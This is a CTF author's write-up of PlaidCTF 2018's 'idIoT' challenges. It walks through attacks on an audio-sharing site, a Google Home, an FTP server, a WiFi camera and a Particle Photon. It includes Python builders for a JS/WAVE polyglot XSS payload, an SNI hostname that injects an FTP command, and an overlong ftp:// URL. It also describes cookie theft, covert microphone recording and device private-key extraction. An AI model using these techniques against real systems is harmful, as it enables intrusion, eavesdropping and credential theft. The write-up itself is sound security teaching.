PlaidCTF 2018: I Heard You Like IoT

May 25th, 2018

For PlaidCTF a few weeks ago, I created a series of problems titled “idIoT”. In this series of challenges, players got the opportunity to attack two websites, a Google Home, an FTP server, a WiFi camera, and a Particle Photon. Participants seemed to enjoy these challenges, so I thought I’d do a little writeup on the creation of these challenges and my own solution guide, like the one Zach did for S-Exploitation last week.

Inspiration

I first had the idea to do a CTF problem using Google Assistant in the late fall of 2017. The original plan was to do a fairly standard XSS problem that required attackers to use the Web Speech API to interface with the smart speaker. However, I realized that I needed to give the attacker microphone access in order to record the Google Assistant’s response, which for privacy reasons would only make sense on a site that already had the user’s permission to use the microphone. This led to the idea to create Clipshare, the audio-sharing site used in the problem.

Much later (around February or so), it occurred to me that it might make for a more interesting problem if I made the XSS nontrivial. Inspired by some previous work I had seen in polyglot files, I poked around with some audio file formats to determine if such an attack would be possible – and to my surprise, it was even fairly straightforward (but more on that later).

The idea to do a problem with a Particle Photon and an LED strip attached to it came to me independently at around the same time as the initial Google Assistant idea. I actually had a Photon set up in my apartment with an LED strip, nearly identical to the one in the problem, and one day I jokingly told it to set the pattern to -1 and laughed at the fact that I was leaking memory. After looking at the accessible information held on the Photon, I realized that one could theoretically leak the Particle’s private key and then impersonate the Photon to post events, and decided to make this into a challenge.

The second part of the challenge, the FTP server with the WiFi camera, was created much later to tie the two parts together. The original concept was to build a custom WiFi camera on a Raspberry Pi with a header injection bug that would let the attacker insert CORS headers and therefore make requests from the Clipshare host. I deemed this a little bit too expensive to pursue, so I instead opted to use some cheap off-the-shelf WiFi cameras that I had access to for some unrelated work. However, every reasonable exploit on the cameras themselves would give the attackers root, which would make it far too easy to permanently take down the challenge. Therefore, I opted to have them attack an easy-to-reset FTP server instead.

Solution

Part 1 (Action)

We’re given the Clipshare website and a user to attack. The problem description indicates that we need to gain access to that user’s clips in order to make them wait on the page for long enough to talk to the Google Home. Poking around, we find that if we add a user as a friend, then we gain the ability to share clips with them. This indicates that this is probably an XSS challenge.

Testing all of the fields in the clip creation form indicates that the description field is trivially injectable (i.e., it doesn’t even have any filters, so you can just write HTML straight into the description). However, the Content-Security-Policy is pretty strict:

Content-Security-Policy: style-src 'self' https://fonts.googleapis.com; font-src 'self' https://fonts.gstatic.com; media-src 'self' blob:; script-src 'self'; object-src 'self'; frame-src 'self'

Therefore, if we want JS execution, we need to have a JS file on-site, which probably means uploading one via the audio upload feature.

However, this raises two problems. First, the audio file is validated through some unknown process (uploading a garbage file results in an “invalid audio file” error), so uploading JS directly isn’t going to work. Second, the Apache server serves audio files with appropriate audio/* MIME types, which Chrome refuses to execute.

Apache selects which MIME type to use based on the file’s extension; however, the server checks the extension of the uploaded file before saving it, and therefore the file must be one of .wav, .wave, .mp3, .ogg, or .webm. Trying all of these, it turns out that Apache doesn’t recognize .wave as a WAVE audio file by default, and therefore serves it with no MIME type, allowing us to execute it as JS with a <script> tag!

This brings us back to the first issue of the server validating audio files through an unknown process; however, as it turns out, we don’t need to exploit the validator, since it’s possible to build a valid JS/WAVE polyglot by using the length field to comment out all of the headers and then embedding our payload in the audio data:

Construction of a polyglot .js/.wave file.
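
As a rough illustration of that layout, here is a minimal Python sketch that assembles such a file. The bytes chosen for the size field (`=1/*`), the 8-bit mono PCM format, and the function name are assumptions made for illustration, not the exact file used in the challenge. It also assumes the validator tolerates a RIFF size field that doesn't match the real file length.

```python
import struct

# Assumption: these four bytes fill the RIFF size field so that the file
# begins with the JavaScript text `RIFF=1/*`, opening a block comment.
SIZE_FIELD = b"=1/*"


def build_js_wave_polyglot(payload_js: bytes) -> bytes:
    """Build a WAVE file that also parses as JavaScript (illustrative sketch)."""
    # fmt chunk body: PCM (1), 1 channel, 8000 Hz, 8000 bytes/s,
    # block align 1, 8 bits per sample.
    fmt_body = struct.pack("<HHIIHH", 1, 1, 8000, 8000, 1, 8)

    # The "audio" data closes the comment and then carries the payload.
    data = b"*/;" + payload_js + b"\n"
    if len(data) % 2:
        data += b" "  # keep the chunk length even

    headers = (
        b"WAVE"
        + b"fmt " + struct.pack("<I", len(fmt_body)) + fmt_body
        + b"data" + struct.pack("<I", len(data))
    )
    # The commented-out headers must not close the comment early.
    if b"*/" in headers:
        raise ValueError("header bytes contain '*/'; adjust the payload length")

    return b"RIFF" + SIZE_FIELD + headers + data
```

Loaded through a <script> tag, the output reads as `RIFF=1/*`, then the commented-out headers, then `*/;` followed by the payload.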

Therefore, we can use the following steps to get the target user’s cookie in order to see their clips:

Create a new clip with a *.wave polyglot containing a payload that sends us the target’s cookie
Create a second clip with the description <script src='/uploads/path-to-first-audio-file.wave'></script>
Share the second clip with the target

This gives us the target’s cookie, which we can then use to impersonate the target and listen to their clips. The first clip tells us the trigger phrase for obtaining the flag – “Ok Google, what is the flag?” – and the second tells us that including the word “spatulate” in the description of our clip will make the target wait on the page for longer. Now we need to use our XSS to leak the flag:

Create a new clip with a *.wave polyglot containing a payload that records from the microphone for about 12 seconds, and then POSTs it to a server we control
Create a second clip whose audio is a recording of you saying “Ok Google, what is the flag?”, and whose description is spatulate <script src='/uploads/path-to-first-audio-file.wave'></script>
Share the second clip with the target

Note that most of the code you need to record the microphone is already available on-site through the “record a clip” feature.

If everything went well, you should get a recording in which the Google Home responds with “the flag is P… C… T… F… open brace… not… underscore… so… underscore… smart… close brace,” giving the flag PCTF{not_so_smart}.

Part 2 (Camera) – Intended solution

In Part 2, we’re given an FTP server binary running on the client’s machine on port 1212 to attack. After some reversing, we find the following:

The server is a fairly straightforward write-only, passive-mode-only FTP server that stores all files in a constant location.
The username and password are neither checked nor required.
There’s an extra command, IP, that changes the IP that the server uses for passive mode. You can only use it if you connect from 127.0.0.1.
The IP command has a bug that allows the command to work without a space before the argument and without a newline directly following the argument – so IP1.2.3.4xxx will set the IP to 1.2.3.4.
The server will close the connection if it receives a line starting with GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, or PATCH.
The server has a bug that causes it to split commands not only on \r\n but also on null bytes.

The disallowing of pretty much every common HTTP verb prevents any sort of direct HTTP request to the server, since the very first line of the request starts with the verb. It also prevents a websocket connection, since the websocket handshake is done over an HTTP request. However, this does not prevent an HTTPS connection, since that will not start with an HTTP verb.

However, can we insert a command into an HTTPS request? Since the FTP server won’t respond with a valid handshake response, the command will need to be in the handshake itself. Here, Orange’s great SSRF talk gives us the answer – we can use the server name indication (SNI) in the handshake to put plaintext data into the HTTPS handshake! Notably, the SNI is preceded by a 16-bit big-endian length field (despite the field whose length it is measuring being at most 255 bytes), so we can use the high byte of the SNI length field, which is always null, to start a new command, and then use the low byte and the SNI itself to produce the IP command:

IP command injection through SNI.

Thus, if we send an HTTPS request to the above host at port 1212, the IP camera will send its images to us instead of the FTP server’s waiting passive port, giving us a picture of the inside of a box with the flag written on the side: PCTF{d0nt_b3_a_SNItch}.
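
The length-field trick can be sketched in Python as follows. Since the low byte of the length has to be the letter I (0x49), the hostname must be exactly 73 characters long and begin with P. The function names and the `base_domain` parameter (a hypothetical domain that would have to resolve to the target machine) are assumptions for illustration; the sketch also assumes the uppercase P survives into the handshake, which depends on the client.

```python
import struct


def build_sni_hostname(attacker_ip: str, base_domain: str) -> str:
    """Return a 73-character hostname of the form P<ip>xxx....<base_domain>."""
    target_len = ord("I")  # 73: the low byte of the length field spells 'I'
    prefix = "P" + attacker_ip
    filler_len = target_len - len(prefix) - 1 - len(base_domain)
    # The filler is glued to the last octet, so that DNS label must stay
    # within the 63-character limit.
    last_label_len = len(attacker_ip.rsplit(".", 1)[1]) + filler_len
    if filler_len < 1 or last_label_len > 63:
        raise ValueError("base domain length does not fit a 73-character name")
    return prefix + "x" * filler_len + "." + base_domain


def sni_name_field(hostname: str) -> bytes:
    """Length-prefixed host name as it appears inside the SNI extension."""
    return struct.pack(">H", len(hostname)) + hostname.encode("ascii")
```

For example, `sni_name_field(build_sni_hostname("1.2.3.4", "example.com"))` begins with a null byte followed by `IP1.2.3.4x`, which the server's null-byte splitting would treat as a fresh line.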

Part 2 (Camera) – Unintended Solution

The FTP server actually has one more bug that I didn’t list above: lines are automatically terminated after 8095 characters, and anything beyond that point is interpreted as part of the next line. Therefore, we can simply redirect the browser to an ftp:// URL with a sufficiently long username: set it to any 8187 characters followed by IPyour.ip.goes.here, and the USER line will get cut off, leaving the IP string to be interpreted as its own command.
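
A minimal Python sketch of building such a URL is below. The function name, the choice of A as the padding character, and the 127.0.0.1:1212 target are assumptions for illustration; the padding length is taken directly from the text above.

```python
def build_ftp_url(attacker_ip: str, padding_len: int = 8187,
                  host: str = "127.0.0.1", port: int = 1212) -> str:
    """Build an ftp:// URL whose username overflows the server's line limit."""
    # Padding fills the rest of the USER line; the tail spills into the
    # next line and is parsed as an IP command.
    username = "A" * padding_len + "IP" + attacker_ip
    return f"ftp://{username}@{host}:{port}/"
```

Redirecting the target's browser to `build_ftp_url("1.2.3.4")` would then point the passive-mode address at 1.2.3.4.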

We actually found and patched out this bug during testing, but apparently I reintroduced it when I was rebuilding the final binary on one of the XSS bots.

This will also get us the flag for Part 2, but won’t work for Part 3, as we’ll see in a minute.

Part 3 (Lights)

We’re given a number of files:

An Arduino program running on a Particle Photon
A dump of the Photon’s flash, with some sections nulled out
A simple HTML dashboard
A text file with helpful notes

Looking at the HTML dashboard, it appears to be listening to Particle events for a specific device ID. Therefore, we probably need to either have the Photon post an event for us, or impersonate the device and post the event ourselves. Once we are able to post an event, getting the flag is pretty easy – we can insert a broken image, and then in its onerror handler post the entire body of the page to a server we control.

The program has no obvious bug that would give us control of the instruction pointer, but does have a straightforward out-of-bounds access when looking up a pattern by index. Using this, we can leak any memory to which we have a pointer by setting the pattern index such that it uses the pointer as its data pointer.

Inspecting the flash dump and cross-referencing it with the Particle docs, it looks like the section that was nulled out was the device’s private key (in both places it appears). Using this private key, we should be able to impersonate the device to create our own event.

Putting these ideas together, a reasonable plan of attack is to leak the device’s private key on the LEDs and use the pictures we’re getting from the IP camera via our attack in part 2 to reconstruct the key. First, this will require us to modify our attack from part 2 to give us the full 3fps stream rather than a single image; this can be done by using the intended attack and then also having the browser repeatedly send HTTP connections to http://localhost:22222 to prevent the FTP server from waiting on incoming data. This gives us about 120 images every time we connect, of which about 100 will contain actually useful data.

Now, we run into a problem: we don’t have a pointer to the private key that we can use to construct a pattern! However, our notes give us the address of where the pattern name is stored, so if we can write a name that resembles a valid pattern struct, then we can use our out-of-bounds from earlier:

typedef struct {
  uint32_t flags;
  char* name;
  uint32_t* colors;
} pattern;

However, we run into another problem immediately, as we need to set the pattern by speaking it to the Google Home. This means we can’t insert arbitrary strings as our pattern; only things that the Google Home will output properly! Even worse, any pointer that would put us near the appropriate parts of the private key would have to contain a byte of either 5e or 9e, the former of which is a special character (^) and the latter of which isn’t even valid ASCII!

There are two ways around this. The one that I produced for the attack uses the fact that Google will translate emoji names to obtain the required bytes; for example, if you say “Ok Google, set pattern to name ‘egg emoji’”, then the pattern will be set to the string "🥚". In particular, I constructed the pointer to the private key using the “disappointed face emoji” (😞), which is UTF-8 encoded as f0 9f 98 9e. Using this with other appropriate words, we can construct our pattern struct:

Constructing a struct through a speech-to-text string to be stored in SRAM.

Conveniently, 0000989e points to a part of the private key just before p; leaking p through this process will allow us to easily determine q, and recover d and the other components of the ASN.1-formatted key.
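
The step from p to the rest of the key is standard RSA arithmetic, sketched below in Python. It assumes the modulus n is already known (for instance from the device's public key) and that the public exponent is 65537; both are assumptions here, as is the function name.

```python
def recover_rsa_private_key(n: int, p: int, e: int = 65537) -> dict:
    """Recover the remaining RSA private-key components from one prime factor."""
    if p <= 1 or n % p != 0:
        raise ValueError("p is not a nontrivial factor of n")
    q = n // p
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
    return {
        "p": p,
        "q": q,
        "d": d,
        # CRT components as they appear in an ASN.1 RSAPrivateKey
        "dP": d % (p - 1),
        "dQ": d % (q - 1),
        "qInv": pow(q, -1, p),
    }
```

With toy values n = 3233, p = 61, and e = 17, this yields q = 53 and d = 2753.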

The other way (discovered by Robert Xiao during testing) is that Google Assistant will translate “to the power of” into a caret, providing the necessary 5e byte. Through a similar process as above, we can read memory just after 00005e20, which puts us part way through the private exponent; we can recover the rest of the exponent (and the rest of the key) using some crypto-based attacks.
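
The byte values behind both tricks are easy to double-check. The small Python helper below (its name is made up for this illustration) prints the UTF-8 encoding of a string as hex.

```python
def utf8_hex(text: str) -> str:
    """Return the UTF-8 encoding of text as space-separated hex bytes."""
    return text.encode("utf-8").hex(" ")


# U+1F61E is the disappointed face emoji; its last byte is the 9e we need.
disappointed_face = utf8_hex("\U0001F61E")
# The caret that "to the power of" produces supplies the 5e byte.
caret = utf8_hex("^")
```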

Thus, we can make the LEDs leak parts of the private key using the following two commands:

“Ok Google, set LED pattern to name ‘acknowledge a disappointed face emoji’” (this loads our fake struct into SRAM at the address given in the “helpful notes” text file)
“Ok Google, set LED pattern to index 78250547” (this index can be computed using the known address of our string in SRAM and the start index of the patterns array that you can figure out from the flash dump)

The private key can then be recovered by manually transcribing the LED colors from the video into the appropriate 2-bit chunks, and then figuring out how they fit together to produce the leaked memory.
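
Once the colors are transcribed, packing them back into bytes is mechanical. The Python sketch below shows the idea only: the color-to-bits mapping and the most-significant-first ordering are hypothetical placeholders, since the real encoding has to be read out of the Photon program.

```python
# Hypothetical mapping from observed LED color to a 2-bit value.
COLOR_BITS = {"off": 0b00, "red": 0b01, "green": 0b10, "blue": 0b11}


def colors_to_bytes(colors: list) -> bytes:
    """Pack transcribed LED colors into bytes, four 2-bit symbols per byte."""
    if len(colors) % 4 != 0:
        raise ValueError("need a multiple of four colors to fill whole bytes")
    out = bytearray()
    for i in range(0, len(colors), 4):
        value = 0
        # Assumption: the first color in each group holds the top two bits.
        for color in colors[i:i + 4]:
            value = (value << 2) | COLOR_BITS[color]
        out.append(value)
    return bytes(out)
```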

Using this recovered private key, we just need to impersonate the Particle to the device.spark.io server. The easiest way to do this is by reimplementing parts of the Particle’s communication library by looking at its source (note that its docs are often misleading or wrong, hence the hint in the “helpful notes” file). We can then test against a local cloud spark server until we get it right, and then run it against the real server once we have it all working. There is one catch: if we impersonate the Photon, then it will get disconnected from the cloud and will immediately attempt to reconnect, which will cause our connection to drop before we are able to post the event. If we force the Photon to crash, however, we can post our event while it’s flashing an error code, allowing us to post our XSS payload and obtain the flag: PCTF{U+1F449_ooO00Oh_4hhh_pr3ttY_cOl0rs_U+1F448}.

Issues and Lessons Learned

While the problem was generally well-received (it was one of the most common answers to the question “what was your favorite problem” in the feedback form), it definitely wasn’t without its fair share of issues. The most obvious one from the above writeup was accidentally leaving in an unintended solution to part 2, but that was far from the largest issue.

idIoT: Action was planned to be released at the beginning of the competition. However, setting up the laptop XSS bots turned out to be a very nontrivial task, since only one of the three setups actually had Ubuntu installed (the others were loaned and had to be returned, and were thus booting from live USBs). This is also why there was only one XSS bot for a long time: it was the only laptop that didn’t require external media (which I neglected to prepare sufficiently far in advance) to start up.

The age of the laptops themselves was also an issue; we had to fully restart work on two of the bots, since faulty hardware managed to corrupt two of the live USBs. This is also why the second bot wasn’t up and stable until around 9 hours into the competition.

There were also a fair number of issues setting up the Photon boxes, but fortunately those issues didn’t affect the competition since it was such a long time before any team reached that part of the problem. Surprisingly, there were almost no issues getting the crappy IP cameras up and running, even though I had anticipated those being quite a chore.

Perhaps the biggest issue, though, was balancing the third part of the problem. By the time any team made it to that part, it probably wasn’t very doable, since the exploit is quite involved; as far as I know, most teams opted to not put much effort into it, which was probably a wise choice. I could say that this was an unfortunate outcome from the competition being only 36 hours instead of the usual 48, but I had sufficient advance notice for that change that I should have adjusted accordingly.

Overall, I’m happy with how the problem came out, but I’m almost definitely never doing anything like this again. (I think I told Zach about twenty times to slug me if I ever try to do another hardware challenge.) Hopefully everyone had as much fun playing this challenge as I had putting it together!

If you want to see a picture of the hardware setups, I created an imgur album with pictures of all three parts.